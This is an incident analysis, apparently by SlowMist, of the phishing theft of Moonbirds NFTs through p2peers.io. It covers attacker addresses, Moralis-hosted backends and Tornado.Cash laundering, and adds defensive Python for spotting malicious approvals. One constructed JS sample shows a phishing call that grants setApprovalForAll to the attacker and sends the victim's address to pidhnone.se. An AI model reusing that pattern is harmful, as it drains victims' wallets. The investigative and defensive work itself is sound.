Analysis of Stolen Moonbird NFTs
On May 25th, Twitter user @0xLosingMoney stated that a user, @Dvincent_, stole 29 Moonbirds NFTs, worth approximately $700,000, through the use of a phishing website, p2peers.io. The website has now been shut down. The user also stated that this domain, along with another, sarek.fi, was used in previous hacking incidents.
The SlowMist security team collected pertinent information in order to conduct an analysis of this incident.
We began gathering and analyzing information regarding this incident, starting with the hacker’s Twitter handle, @Dvincent_, which is no longer available. We then discovered that on May 10th, Twitter user @just1n_eth (a BAYC series NFT holder) stated that @Dvincent_ had reached out to him to trade BAYC NFTs. An agreement to trade was reached, but the transaction was never finalized because @Dvincent_ insisted on using a platform unfamiliar to @just1n_eth. That platform was p2peers.io, a phishing scam.
Within the Twitter comment section, another user, @jbe61, stated that he had also encountered the same individual (@Dvincent_) a few days prior. Here’s a screenshot of that conversation below:
On the evening of May 25, 2022, user @0xLosingMoney made a Twitter announcement regarding the hacker’s wallet and other information relevant to the hacker, @Dvincent_.
Here is the address @0xLosingMoney provided:
Analysis of Related Addresses
Since the entire hack pertains to the phishing website “p2peers.io”, we’ll start our investigation there. The phishing website’s domain name was registered under a Finnish company. Even though the website was suspended, we were still able to find some information on the website’s homepage through a Google snapshot.
Since it’s no longer possible to view the JS code directly, we went through the history of the cached snapshot to find the main JS source code; the snapshot was taken on April 30, 2022.
Sorting through the JS, we were able to find information on the phishing website and the transaction addresses involved within the code.
We located the approval address on line 912 in the code:
The address used by the approval-related function was also found on line 3407 of the code: 0xc9E39Ad832cea1677426e5fA8966416337F88749
We started analyzing the transaction records of these two addresses:
Our first lookup on Etherscan showed that address 0x7F7…b6A is a malicious contract.
The creator’s (attacker’s) address for this malicious contract is 0xd975f8c82932f55c7cef51eb4247f2bea9604aa3, where multiple records of NFT transactions were found.
Using NFTGO to check the holdings of this address, we found that the stolen NFTs were still being held and had yet to be sold. The value of the stolen NFTs was approximately $225,475.
We continued our investigation using MistTrack to analyze the transaction history of the attacker’s address:
We found that this address had only 12 ETH transactions, and its balance was only 0.0615 ETH.
The second address, 0xc9E39Ad832cea1677426e5fA8966416337F88749, was also a contract address. The address that created it was 0x6035B92fd5102b6113fE90247763e0ac22bfEF63, which was also mentioned in the list of hacker addresses published by @0xLosingMoney.
Using MistTrack, we found that this address had a transaction history that involved 21 deposits and 97 withdrawals, with a total of 106.2 ETH transferred out.
Looking through the deposit and withdrawal history, we found multiple transfers to Tornado.Cash, indicating the hacker was trying to hide their stolen funds.
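The phishing flow above hinges on the victim granting an NFT-wide approval to the attacker’s contract. The following added example (not code from the article or from SlowMist) shows how a defender can decode ERC-721 ApprovalForAll logs, as returned by eth_getLogs, and flag approvals granted to operators outside an allowlist. The victim, collection and marketplace addresses are constructed placeholders; the malicious operator is the contract address quoted in the article.

```python
# Keccak-256 of "ApprovalForAll(address,address,bool)", the ERC-721 event signature hash.
APPROVAL_FOR_ALL_TOPIC = "0x17307eab39ab6107e8899845ad3d59bd9653f200f220920489ca2b5937696c31"

# Constructed placeholders (not real addresses) for the victim, collection and a trusted marketplace.
VICTIM = "0x2222222222222222222222222222222222222222"
COLLECTION = "0x3333333333333333333333333333333333333333"
MARKETPLACE = "0x1111111111111111111111111111111111111111"
# Operator address taken from the phishing site's JS, as quoted in the article.
MALICIOUS_OPERATOR = "0xc9E39Ad832cea1677426e5fA8966416337F88749"

# Placeholder allowlist: in practice, fill it with the operators you actually trust.
KNOWN_OPERATORS = {MARKETPLACE.lower()}


def pad_topic(addr: str) -> str:
    """Encode an address as a 32-byte indexed topic (left-padded with zeros)."""
    return "0x" + addr[2:].lower().rjust(64, "0")


def topic_to_address(topic: str) -> str:
    """Recover the 20-byte address from a 32-byte indexed topic."""
    return "0x" + topic[-40:].lower()


def decode_approval_for_all(log: dict):
    """Return the decoded event, or None if the log is not an ApprovalForAll."""
    topics = log["topics"]
    if len(topics) != 3 or topics[0].lower() != APPROVAL_FOR_ALL_TOPIC:
        return None
    return {
        "collection": log["address"].lower(),
        "owner": topic_to_address(topics[1]),
        "operator": topic_to_address(topics[2]),
        "approved": int(log["data"], 16) != 0,  # bool is ABI-encoded as a 32-byte word
    }


def suspicious_approvals(logs, known_operators=KNOWN_OPERATORS):
    """Flag active approvals whose operator is not on the allowlist."""
    findings = []
    for log in logs:
        ev = decode_approval_for_all(log)
        if ev and ev["approved"] and ev["operator"] not in known_operators:
            findings.append(ev)
    return findings


# Constructed sample logs: one approval to the marketplace, one to the malicious operator.
SAMPLE_LOGS = [
    {"address": COLLECTION, "data": "0x" + "0" * 63 + "1",
     "topics": [APPROVAL_FOR_ALL_TOPIC, pad_topic(VICTIM), pad_topic(MARKETPLACE)]},
    {"address": COLLECTION, "data": "0x" + "0" * 63 + "1",
     "topics": [APPROVAL_FOR_ALL_TOPIC, pad_topic(VICTIM), pad_topic(MALICIOUS_OPERATOR)]},
]
```

Running `suspicious_approvals(SAMPLE_LOGS)` yields the single approval to the attacker’s contract, which is the signal to revoke it before the operator can move the tokens.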
Hackers Utilize Moralis Functions for Malicious Purposes
On line 409 of the JS code, we found that the function interfaced with the domain usemoralis.com.
Port 2053 was used for the API address and port 2083 for the backend login address.
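The triage steps described so far (finding the approval address in the JS, then the usemoralis.com API and panel endpoints with their ports) can be automated over a cached JS snapshot. The following added example is not code from the article or from SlowMist; the embedded JS is a constructed stand-in for the phishing site’s bundle, reusing only the operator address and domains quoted in the article.

```python
import re
from urllib.parse import urlsplit

# Constructed sample of a phishing site's bundled JS (not the real p2peers.io code).
SAMPLE_JS = """
const API = "https://abc123.usemoralis.com:2053/server";
const PANEL = "https://abc123.usemoralis.com:2083/";
const OPERATOR = "0xC9e39AD832CEA1677426E5FA8966416337F88749";
async function onConnect(nft, victim) {
  await nft.methods.setApprovalForAll(OPERATOR, true).send({ from: victim });
  fetch("https://pidhnone.se/api/submit?addr=" + victim);
}
"""

ADDR_RE = re.compile(r"0x[0-9a-fA-F]{40}\b")
URL_RE = re.compile(r"""https?://[^\s'"`)]+""")
# Calls that hand control of a wallet's assets to a third party; each call site deserves review.
RISKY_CALLS = ("setApprovalForAll", ".approve(", "permit(")


def extract_indicators(js_source: str) -> dict:
    """Pull addresses, remote endpoints and risky call sites out of a JS snapshot."""
    addresses = sorted({a.lower() for a in ADDR_RE.findall(js_source)})
    endpoints = set()
    for url in URL_RE.findall(js_source):
        parts = urlsplit(url)
        default_port = 443 if parts.scheme == "https" else 80
        endpoints.add((parts.hostname, parts.port or default_port))
    call_sites = []
    for lineno, line in enumerate(js_source.splitlines(), start=1):
        if any(marker in line for marker in RISKY_CALLS):
            call_sites.append((lineno, line.strip()))
    return {
        "addresses": addresses,
        "endpoints": sorted(endpoints),
        "call_sites": call_sites,
    }
```

The returned addresses are the ones to look up on Etherscan (contract or not, creator, transfer history), and the endpoints are the hosts to check for other phishing kits sharing the same backend.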
Through our search, we found a large number of NFT-related websites under the domain name “usemoralis.com”, many of which are phishing sites.
A simple Google search displayed multiple NFT sites with the same subdomain.
So, we went through and queried all of usemoralis.com’s subdomains and found that there were more than 3,000 subdomain sites related to usemoralis.com currently running on Cloudflare.
We found that all of these sites are run by services provided by Moralis:
Moralis is a service that’s dedicated to developing and building Web3 DApps.
When you register, you’re presented with a management interface and an address. This makes it easy and cheap to make phishing websites.
Exploring the Background of the Scam and Connecting it to Phishing Events
Continuing our analysis of the JS code, on line 368, we found an interface for submitting the victim’s address to a website with a domain name: pidhnone.se.
After reviewing the data, the interfaces using the domain name pidhnone.se are:
After more research, we found that https://pidhnone.se/login is a fraudulent backend control panel that hackers use to manage information, such as the defrauded assets.
By constructing the URL in the same form as the backend’s address, one can see both the attacker’s address and the address of the person being attacked.
The backend contains visual information and instructions on how to use the interface, which makes it obvious that the website’s operations are fraudulent.
We examined the information in the backend, such as the images:
This includes information about phishing sites that hackers have used in the past, such as nftshifter.io
Let’s use the phishing website nftshifter.io as an example:
If you look at the relevant records on Twitter, you can see that on March 25, 2022, a victim visited the phishing website and posted about it.
We analyze nftshifter.io the same way:
Analyzing the JS code:
We found that the Moralis service and the fraud link https://pidhnone.se/ are also being used for control.
The malicious address listed below:
Contract creation time: Mar-24-2022 09:05:33 PM +UTC
At the same time, we discovered that this attacker is associated with 9 malicious contracts that share the same code:
Viewing the malicious contract address 0xc9E…749, we can see that the creator’s address is 0x6035B92fd5102b6113fE90247763e0ac22bfEF63:
The same method has been used for laundering funds. Each malicious contract has the transaction record of each victim, which we will not show here.
Let’s take a look at another victim.
A user was misled right after the attackers launched the malicious phishing scam.
The attacker ended up selling the NFTs, exchanging them for ETH. We used MistTrack to analyze the attacker’s address: 0x9d194cbca8d957c3fa4c7bb2b12ff83fca6398ee
We can see that 51 ETH has been transferred to Tornado.Cash for the purpose of asset laundering. The attacker’s Twitter account, @nftshifter io, has been frozen and can’t be seen right now.
- Never click on any links or download any attachments from unknown sources.
- Most importantly, never disclose your private key and/or your recovery mnemonic.
- Always use a strong password and enable two-factor authentication (2FA). This extra layer of security will better protect your account.
- Whenever you’re uncertain about something, make sure you verify its legitimacy and confirm it using reliable sources.
- Do not send sensitive information over the Internet that attackers can use to send phishing emails to specific users.
- For more security tips, read this manual: Blockchain-dark-forest-selfguard-handbook